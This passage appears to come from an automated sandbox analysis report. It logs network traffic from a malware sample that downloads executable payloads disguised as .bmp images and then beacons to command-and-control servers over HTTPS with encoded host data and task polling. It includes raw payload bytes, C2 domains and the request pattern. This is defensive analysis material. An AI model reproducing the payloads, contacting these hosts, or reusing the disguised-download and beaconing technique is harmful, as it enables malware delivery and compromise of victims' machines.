                              Aug 27, 2024 09:48:51.311599970 CEST1236INData Raw: e9 d0 fc ff 93 3c ff d6 e1 e9 bc fc 93 93 50 8d d1 d4 fc ff 93 84 b8 ef 93 93 c7 45 90 6b 00 00 6c e7 00 3b af 18 04 8b 64 87 02 33 a5 e7 85 8c 90 93 ff 8b 7c 3d 50 ff 3e 40 83 4d 90 93 8d bd d4 90 ff ff 84 85 ef ff 93 06 08 5f e7 ab 68 fc cb 6d
                              Data Ascii: <PEkl;d3|=P>@M_hm)WiEw (Een)d )Uqf)ta1f<D;fhlkPT<h<y|Ef)<


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.561383188.114.97.3806148C:\Users\user\Desktop\Rudvfa0Z17.exe
                              TimestampBytes transferredDirectionData
                              Aug 27, 2024 09:48:51.843849897 CEST120OUTHEAD /4/text.bmp HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: web.ad87h92j.com
                              Aug 27, 2024 09:48:52.314259052 CEST694INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:48:52 GMT
                              Content-Type: image/bmp
                              Content-Length: 6443425
                              Connection: keep-alive
                              Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                              ETag: "607df428a8e9da1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: HIT
                              Age: 388
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnYt%2BLFQTQLEUpmJn0YY3moUNCQvsf99kmIPFkcT79iDfoXItcvAo6D0fGUW6lyysbmdNLdgZLIAdJXNSOF7UE%2BngeaxXF%2FETBJWJVvSd4yUIAdqZ7HCM%2Bp%2BpDroR1Go9AC7"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a76329e9b4394-EWR
                              alt-svc: h3=":443"; ma=86400
                              Aug 27, 2024 09:48:52.317295074 CEST119OUTGET /4/text.bmp HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: web.ad87h92j.com
                              Aug 27, 2024 09:48:52.420311928 CEST1236INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:48:52 GMT
                              Content-Type: image/bmp
                              Content-Length: 6443425
                              Connection: keep-alive
                              Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                              ETag: "607df428a8e9da1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: HIT
                              Age: 388
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gmftxSaKwtS4UJ5kgx4HMQwvWpl56Eh%2F9UIMomMLsLV5qNUoAw8KyHWwzcGcSWW7rV4TGJZtbMRG0AZWfWpvuOL2szeqmKRIFCwE%2B9tK%2BHEIYKgHq5AReo5Z4S9s655RXVp"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a76334edf4394-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c [TRUNCATED]
                              Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G
                              Aug 27, 2024 09:48:52.420326948 CEST1236INData Raw: ca 98 2c 66 e6 52 4a 96 de f4 55 2f 87 04 f5 77 df 64 b2 b2 cf 7f db 8e e0 a3 c6 bc f2 d8 76 d0 2d a3 8a 92 84 92 1d 04 c3 21 d5 41 3d 5c 5c 55 6e db e0 06 fc 85 66 0c f1 90 1a 88 35 63 60 37 93 5b 01 d5 74 bb 3a a9 99 4a 31 1f 93 12 2f 48 56 f1
                              Data Ascii: ,fRJU/wdv-!A=\\Unf5c`7[t:J1/HV%6IIBej">($|:Wb.wAx*BMX}bpk055^%wC ua}*:?u!j[0;!BidiF2T2mgC}R.2J
                              Aug 27, 2024 09:48:52.420336962 CEST1236INData Raw: 4a 43 de a3 3c a5 4a 7f 2f 8e 72 df 6e ac 75 3e 67 55 0e a7 3b f5 2f 91 20 bb f7 4b d4 ca dd ce 1f 20 92 23 b8 3c f4 25 31 11 a8 5d ab ac 68 ea 27 da 48 b8 6c 98 73 b8 95 b5 85 26 bf d9 58 2a c2 66 8c 74 56 0a 6b 37 95 54 eb 8c 0f 4f 2b 78 c4 38
                              Data Ascii: JC<J/rnu>gU;/ K #<%1]h'Hls&X*ftVk7TO+x8<nt_/!bBI)1d+s:jYE%kS^4v]\`;^t3msXW[U>^O)jA5/MMg~L+iv 'MP!H(
                              Aug 27, 2024 09:48:52.420377970 CEST672INData Raw: ab 89 f1 86 65 83 66 eb 78 14 b0 3c 8e 7c d7 9a 29 6c 14 a9 7a d8 e5 fd d3 34 1c 17 a8 c7 07 e7 45 af 95 47 bc 69 48 a9 a9 d0 be de b2 e1 95 af 2c 1a a5 20 b5 67 27 a5 e9 28 10 a8 5e 1b da 47 92 6e 8c c9 f8 70 86 57 63 7b a3 be 01 e5 bb 6c 47 3c
                              Data Ascii: efx<|)lz4EGiH, g'(^GnpWc{lG<1q;9*IOH>9l_41"5_1A}u5v\s~qN4{+uZN2vuRsK}>cMuWo8?v`O,3$T2|yg$&
                              Aug 27, 2024 09:48:52.420387983 CEST1236INData Raw: 29 33 c6 f4 cd 9e 51 25 f6 ae 87 49 72 1d bc 03 43 76 ea 9c a1 2a b8 d8 64 dc e5 a8 e6 8a f3 e3 23 4b 8f e6 5d 51 d5 30 63 b2 54 61 a9 d3 39 ef b0 7c 83 01 e7 98 0d 91 85 43 4e 83 38 3f 41 81 fb cc 16 dd 2e 42 2f b2 69 7b 56 d7 55 6f 1a 79 a6 c1
                              Data Ascii: )3Q%IrCv*d#K]Q0cTa9|CN8?A.B/i{VUoyVreZsFll m2#:brR*w'psP2mOYF||\^D5k6F },mkmtu&PADr~@&x<s%A
                              Aug 27, 2024 09:48:52.420393944 CEST1236INData Raw: 52 04 0b 5c 4d cd fe f3 83 66 3f a6 62 b2 21 35 ef bd 2e b1 29 4f 32 64 ea a6 ae bb 91 22 3e e1 f8 8e cf 15 c6 90 86 4d 0e 04 52 7a c1 20 1b f0 90 d7 cc 44 0f d1 eb f5 ff 3e dc 3f 53 e6 62 68 dd 81 d1 2f 90 46 00 ff 6b 30 a7 e4 95 32 cb bd 1f 8a
                              Data Ascii: R\Mf?b!5.)O2d">MRz D>?Sbh/Fk02S&?,){MBQ"z3z)]sP*px_*o1N"9DPvt#lmcM]YPNxy'@Alk2$B]!eL}bq
                              Aug 27, 2024 09:48:52.420427084 CEST1236INData Raw: 0f 4b b3 a5 aa a0 bb 31 1b b8 8e 31 60 fc b3 2c 59 19 d4 bb 54 c4 8a 6e a1 b7 7f 83 c5 7e 08 ca 23 fb b5 f4 9b 60 da 68 9d 5f fc 0b 85 7e cc 04 51 d9 74 b6 b9 9e c6 e6 c4 8d e3 79 aa d8 ff 17 fe c1 5f 04 f8 26 b6 2e 89 f0 4d 1c 2c cf 85 a8 9b 8b
                              Data Ascii: K11`,YTn~#`h_~Qty_&.M,[5<K(uOEKoV=c?.&*ln'MYi(/l6}IyL+#fm\(|}A(`W$v,}Ta<xXk?Nq6S
                              Aug 27, 2024 09:48:52.420439005 CEST1236INData Raw: 7e 50 2d d1 14 e8 bc cf 56 bd 86 07 8b 9c 25 3c 7f 30 3f b4 5a e2 fc 68 6c 79 98 73 eb 15 e6 48 9e 8e f3 ea 29 a1 3b 8a 57 8d d2 5d 53 ab 49 d0 81 f3 a7 aa 67 a6 eb e6 61 87 47 18 85 ca 6a 64 cd d5 91 19 1a 26 56 a0 24 34 d0 35 35 14 90 71 c7 b2
                              Data Ascii: ~P-V%<0?ZhlysH);W]SIgaGjd&V$455qgL$"x "T55*i)$*(0it$IF&.,-ExHm=YryQ^$y62@Ohj6dSk[I3f[M
                              Aug 27, 2024 09:48:52.420561075 CEST1236INData Raw: f5 be 65 a5 8d d1 37 e6 e8 01 72 5d 42 94 01 18 dc 23 5c 7b 22 90 9f 42 01 9d aa e6 12 97 86 93 a2 34 74 7e f4 cb 75 bc 7d a9 da 3a ca d2 47 a5 ed 8d ce 07 8b 52 9f 3c cc 8b b9 08 db 8f bd ef 61 85 ff b3 39 cd 72 74 f4 3e ee b8 d2 f8 b5 12 81 c8
                              Data Ascii: e7r]B#\{"B4t~u}:GR<a9rt>,-5,:8Y#`:FAX/A2,~Xf|8*b5PC-j!T.5O`U$/^Mh|,s?Bg3Ynf9 B_E`I
                              Aug 27, 2024 09:48:52.420572996 CEST1236INData Raw: 50 f6 89 d9 72 79 03 19 16 3f e3 a7 df 41 3f 5c d0 59 1b 31 1c d5 08 85 51 c9 91 7a fb 8b 57 b3 e4 81 de f4 87 cf 73 3e 1d 2d ca 92 d4 43 10 87 d4 c3 14 1a 6b 54 0e e1 72 a5 24 c9 25 3b 98 0f 38 58 6f 30 d0 de c2 7a 8e c6 5c e0 ef 1a 70 ef 9c 59
                              Data Ascii: Pry?A?\Y1QzWs>-CkTr$%;8Xo0z\pYI`MRv_`wFr1bdy*LG,>{(M8?UO!ojPaeEEbO5oH7IUDGH4kQZanWz.#ZzM$
                              Aug 27, 2024 09:48:52.421256065 CEST776INData Raw: 01 58 6d f9 28 3f 5a cf 26 6f 1f c3 13 2a 9a ae fa dc d0 79 b4 ef b0 7e 64 4c f5 8e c2 de 04 f7 38 21 61 04 06 56 f2 b3 3d 6f f0 7c 87 f3 08 07 44 ef 31 d8 92 e4 60 57 0b 5f f9 43 76 03 51 f9 b9 7a 43 12 07 91 1f 02 10 49 32 ec c7 a6 5c 78 8f 00
                              Data Ascii: Xm(?Z&o*y~dL8!aV=o|D1`W_CvQzCI2\xE99Jl])=*RYAIB'k:t92_9?0S?I_kk^\^"B( V?xPN240X; B}V3`](<GP!kg3
                              Aug 27, 2024 09:48:58.170043945 CEST117OUTHEAD /4/d.bmp HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: web.ad87h92j.com
                              Aug 27, 2024 09:48:58.275208950 CEST694INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:48:58 GMT
                              Content-Type: image/bmp
                              Content-Length: 1236598
                              Connection: keep-alive
                              Last-Modified: Sat, 10 Aug 2024 07:20:10 GMT
                              ETag: "80fe2fbcf5eada1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: HIT
                              Age: 387
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lML%2FUHMpReGaI05ZRboqV1emgYfA98ILNPeDeFLOoLL%2FTSC%2FNzcRek0qQ5%2FGtJcs6GvVShetW8zkUXBtUYLAcHX0KWXZaRJLf92J%2F5q3tvuzWyOpbUAmQBEvfrjygnuoDeDH"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a7657da6d4394-EWR
                              alt-svc: h3=":443"; ma=86400
                              Aug 27, 2024 09:48:58.275882959 CEST116OUTGET /4/d.bmp HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: web.ad87h92j.com
                              Aug 27, 2024 09:48:58.380928993 CEST1236INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:48:58 GMT
                              Content-Type: image/bmp
                              Content-Length: 1236598
                              Connection: keep-alive
                              Last-Modified: Sat, 10 Aug 2024 07:20:10 GMT
                              ETag: "80fe2fbcf5eada1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: HIT
                              Age: 387
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4Hqw6lB6SDxBLCFYBZj7pT4txkQX1JRBkkiBKSbOtHMbbqJgDVHngRY1L8KgfeWGDrTJBmIaVySHD15tNM4KU7K0xN3qcDer0l9FCxEI7RftCFap5AEZ24%2BAo6XCFajLhe2"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a76588ac84394-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 42 4d 76 de 12 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 02 00 00 2c 02 00 00 01 00 20 00 00 00 00 00 40 de 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 52 90 00 64 08 00 00 63 08 00 00 98 f7 00 00 df 08 00 00 67 08 00 00 27 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 67 08 00 00 97 08 00 00 69 17 ba 0e 67 bc 09 cd 46 b0 01 4c aa 29 54 68 0e 7b 20 70 15 67 67 72 06 65 20 63 06 66 6e 6f 13 28 62 65 47 7a 75 6e 47 61 6e 20 23 47 53 20 0a 67 64 65 49 05 0d 0a 43 08 00 00 67 08 00 00 9a 88 c4 41 de e9 aa 12 de e9 aa 12 de e9 aa 12 b1 9f 34 12 ea e9 aa 12 b1 9f 00 12 46 e9 aa 12 b1 9f 01 12 f1 e9 aa 12 d7 91 29 12 dd e9 aa 12 d7 91 39 12 cf e9 aa 12 de e9 ab 12 04 e9 aa 12 b1 9f 05 12 ff e9 aa 12 b1 9f 31 12 df e9 aa 12 b1 9f 30 12 df e9 aa 12 b1 9f 37 12 df e9 aa 12 35 61 63 68 de e9 aa 12 67 08 00 00 67 08 00 00 37 4d 00 00 2b 09 05 00 52 1c b7 66 67 08 00 00 67 08 00 00 87 08 02 21 6c 09 0a 00 67 b6 0a 00 67 38 09 00 67 08 00 00 43 55 08 00 [TRUNCATED]
                              Data Ascii: BMv6(,, @*Rdcg'ggggggggigFL)Th{ pggre cfno(beGzunGan #GS gdeICgA4F)91075achgg7M+Rfgg!lgg8gCUgggggbgbgg8gge@gggggwA>g8?gggggHgggggggg? 'gggggggggI|ex
                              Aug 27, 2024 09:49:00.273962975 CEST117OUTHEAD /4/t.bmp HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: web.ad87h92j.com
                              Aug 27, 2024 09:49:00.380245924 CEST685INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:00 GMT
                              Content-Type: image/bmp
                              Content-Length: 569918
                              Connection: keep-alive
                              Last-Modified: Thu, 08 Aug 2024 15:32:42 GMT
                              ETag: "20368335a8e9da1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: HIT
                              Age: 387
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FSR2GYGTWD1sXikBgfQ%2FHHiFtnN4VcMGi0p8wGVt97T9hXcF7UgaZQKCuqFzYBG6qUgIm1yos84Qos0Goj397a4qcUBnlCdIVnlbrk0oXxoeyKdtvX705wrnYcTaCMhIIeQ1"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a766508c14394-EWR
                              alt-svc: h3=":443"; ma=86400
                              Aug 27, 2024 09:49:00.381020069 CEST116OUTGET /4/t.bmp HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              Host: web.ad87h92j.com
                              Aug 27, 2024 09:49:00.491158962 CEST1236INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:00 GMT
                              Content-Type: image/bmp
                              Content-Length: 569918
                              Connection: keep-alive
                              Last-Modified: Thu, 08 Aug 2024 15:32:42 GMT
                              ETag: "20368335a8e9da1:0"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: HIT
                              Age: 387
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dXnehFb2YPBGPkVIXRirePBSGnphsgtIFmShx6lFtAgIOk6H%2B%2FzVi69sZ4e3dAD0Q6378LwRrJHFrHNa3xxtcMNSggwdxowmNJcz5Fhul2Cn5tgQnUMJcKrP6N51pfSdrKt2"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a7665a9094394-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 42 4d de b2 08 00 00 00 00 00 36 00 00 00 28 00 00 00 7a 01 00 00 79 01 00 00 01 00 20 00 00 00 00 00 a8 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f 08 00 00 67 50 55 89 82 81 c2 05 98 03 00 00 e6 ca ff b1 6f 08 68 05 67 08 00 68 63 08 00 00 35 60 ab 74 8d 51 50 e8 62 08 00 00 e4 cc 14 c9 a4 89 ec 14 66 08 00 53 32 5e 57 6a 0c 50 6a 65 01 81 84 24 ab 08 00 00 54 e5 58 6a 15 51 6a 6e 3c 62 6c 5a 0d 3b 66 89 e3 2c ce 00 67 08 66 89 e3 2c d4 00 67 08 58 6a 55 6e 89 84 43 d0 00 00 67 50 6a 2e 01 81 84 24 bd 08 00 00 3f 62 64 66 ee 8c 24 dc 67 08 00 58 ee a4 24 b0 67 08 00 89 0b 2c 34 89 cb 2c b8 00 67 08 89 ac 43 cc 00 00 67 81 ac 24 d3 08 00 00 ee a4 24 ac 67 08 00 89 cb 2c e0 00 67 08 66 89 eb 2c cc 00 67 08 66 89 fb 2c ce 00 67 08 66 89 f3 2c d2 00 67 08 66 89 e3 2c da 00 67 08 66 89 f3 2c dc 00 67 08 66 89 f3 2c de 00 67 08 c6 44 43 34 53 88 33 2c 3d 66 a0 4c 24 3e 02 6d c6 44 43 48 70 66 a0 4c 24 50 2b 67 c6 44 43 5a 61 88 23 2c 53 66 a0 4c 24 54 2b 61 c6 44 43 5e 62 88 2b 2c 57 c6 [TRUNCATED]
                              Data Ascii: BM6(zy gPUohghc5`tQPbfS2^WjPje$TXjQjn<blZ;f,gf,gXjUnCgPj.$?bdf$gX$g,4,gCg$$g,gf,gf,gf,gf,gf,gf,gDC4S3,=fL$>mDCHpfL$P+gDCZa#,SfL$T+aDC^b+,W#,XaD$YD$=qAfL$D1aLCNf#,GtD$.iTCBDCCA3,L3,MfL$Nkf#,\VL$9nDCWtuL$aT$D$XLClDCmotkDCat,gF,gCg}sh.$$|Cg$kti$gomY,gLCeLC|LCqCg


                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.561384104.21.17.454433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:20 UTC281OUTPOST /api.php/common/getdomain HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              Content-Length: 18
                              Host: cacer.goldenh0ur.com
                              2024-08-27 07:49:20 UTC18OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 43 55 30 3d
                              Data Ascii: A0TxZkW19VWhYOCU0=
                              2024-08-27 07:49:21 UTC730INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxJwvfN5mONGmPbILk09a2lDADPRQEwkes44beMudql%2FsrtYVOcJnnB5vgLkxX80TVjlAlyHcvVQQaYH2Ntm60QKkDHVpSeUFGPPXYb4rdNSKT0Q6sRnERVZ0PYKaMknXxsENYj6Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a76e5cce272b7-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-27 07:49:21 UTC48INData Raw: 32 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 2c 22 44 6f 6d 61 69 6e 22 3a 22 6d 76 63 2e 77 69 74 68 6f 75 74 79 6f 75 35 2e 63 6f 6d 22 7d 0d 0a
                              Data Ascii: 2a{"Token":1,"Domain":"mvc.withoutyou5.com"}
                              2024-08-27 07:49:21 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.561385104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:22 UTC283OUTPOST /api.php/common/receivejson HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              Content-Length: 466
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:49:22 UTC466OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 42 67 67 49 48 42 5a 38 57 31 64 5a 58 49 46 6f 46 67 34 57 43 52 45 47 47 67 6b 43 45 42 6f 47 47 67 55 57 48 42 61 41 57 30 64 45 65 6c 6c 64 56 52 59 4f 46 67 6b 48 42 41 63 45 45 52 59 63 46 6e 74 6e 67 56 70 53 57 78 59 4f 46 68 35 39 59 56 64 47 57 30 64 62 55 6b 51 59 59 32 46 61 56 46 74 44 52 78 67 4a 43 42 68 6f 52 6c 73 43 42 42 31 57 59 55 52 51 41 67 51 57 48 42 5a 48 57 31 4a 45 51 31 6c 47 56 52 59 4f 46 6d 4e 68 57 6c 52 62 51 30 63 59 64 46 56 53 56 56 70 55 56 55 59 57 48 42 5a 58 53 45 56 72 58 57 42 4f 46 67 34 57 67 56 70 45 56 56 77 67 5a 69 45 59 64 31 74 47 56 53 42 6b 66 53 45 47 47 48 64 6f 5a 52 67 43 41 67 67 49 47 48 67 59 42 68 6f 45 43 42 68 7a 67 45 34 57 48 42 5a 5a 56 30 52 68 51
                              Data Ascii: A0TxZkW19VWhYOBggIHBZ8W1dZXIFoFg4WCREGGgkCEBoGGgUWHBaAW0dEelldVRYOFgkHBAcEERYcFntngVpSWxYOFh59YVdGW0dbUkQYY2FaVFtDRxgJCBhoRlsCBB1WYURQAgQWHBZHW1JEQ1lGVRYOFmNhWlRbQ0cYdFVSVVpUVUYWHBZXSEVrXWBOFg4WgVpEVVwgZiEYd1tGVSBkfSEGGHdoZRgCAggIGHgYBhoECBhzgE4WHBZZV0RhQ
                              2024-08-27 07:49:22 UTC696INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:22 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4QlNAKJ%2BXi7Sq1w3DLHR3uMhOaqqCAdXNjNxDLp4qrRWxvEub0oyb6yrVUBz%2BWYG0f3ysjBML2K23JrX2Hl5PzzFEZ6xMq1dfIlDp3lGCnulhxyxNemVyR8ZCkYi%2FYL2zUAKLlg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a76ee49fb03d5-EWR
                              2024-08-27 07:49:22 UTC56INData Raw: 33 32 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 35 2c 22 6d 65 73 73 61 67 65 22 3a 22 39 35 73 71 76 67 69 6a 74 37 6c 34 35 32 39 71 72 39 37 35 39 33 35 68 69 6d 22 7d 0d 0a
                              Data Ascii: 32{"Token":5,"message":"95sqvgijt7l4529qr975935him"}
                              2024-08-27 07:49:22 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.561386104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:23 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:49:23 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 43 45 30 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CCE0=
                              2024-08-27 07:49:24 UTC544INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:24 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5atcPk%2B2ZWnVOqJsdjk1WBMZAuEkMy%2Fnh8BkPKORrYmdvmcH3em9I1OnU49jPRVaS5pBilyIZlkFhzOouFzySK3IstXNhG%2BKNFJ4w7zUlX%2Bnhj0jEZYVuDIX2Z4kIb6%2BOYshXaM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a76f6dff243a5-EWR
                              2024-08-27 07:49:24 UTC46INData Raw: 32 38 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 54 61 73 6b 53 6c 65 65 70 22 3a 36 7d 0d 0a
                              Data Ascii: 28{"Token":117,"message":"","TaskSleep":6}
                              2024-08-27 07:49:24 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.561387104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:33 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:49:33 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:49:34 UTC542INHTTP/1.1 200 OK
